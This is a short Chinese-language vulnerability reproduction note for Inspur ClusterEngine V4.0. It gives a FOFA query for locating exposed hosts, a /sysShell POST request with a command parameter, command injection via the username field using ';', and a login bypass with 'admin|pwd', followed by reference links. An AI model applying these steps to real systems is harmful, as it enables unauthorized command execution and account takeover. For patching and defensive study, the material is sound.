V2AS问路
浪潮 ClusterEngineV4.0 任意命令执行
阅读原文时间:2023年07月09日阅读:2

1、浪潮ClusterEngineV4.0 任意命令执行

影响版本 ClusterEngineV4.0

2、漏洞影响

远程代码执行

3、复现

fofa语句 title='TSCEV4.0'

抓包构造exp

POST /sysShel

……

op=doPlease&node=cu01&command=ls

4、username远程代码执行

登录抓包,闭合username参数

使用;进行命令分割

5、任意用户登录

用户名输入admin|pwd,密码任意

成功登录

6、参考链接

https://github.com/NS-Sp4ce/Inspur/tree/master/ClusterEngineV4.0%20Vul

https://blog.csdn.net/DUANYU23/article/details/115499280

手机扫一扫

移动阅读更方便

阿里云服务器
腾讯云服务器
七牛云服务器

你可能感兴趣的文章

centos linux安全和调优 第四十一节课
每个后端都应该了解的OpenResty入门以及网关安全实战
Web应用防火墙--规则防护

4

Python潮流周刊#9:如何在本地部署开源大语言模型?

5

PHP文件包含总结

6

完全可复制、经过验证的 Go 工具链

7

细数2019-2023年CWE TOP 25 数据,看软件缺陷的防护

8

VulnStack - ATT&CK红队评估实战(四) Writeup

9

应用程序接口(API)安全的入门指南

10

O2OA(翱途)开发平台 V8.1正式发布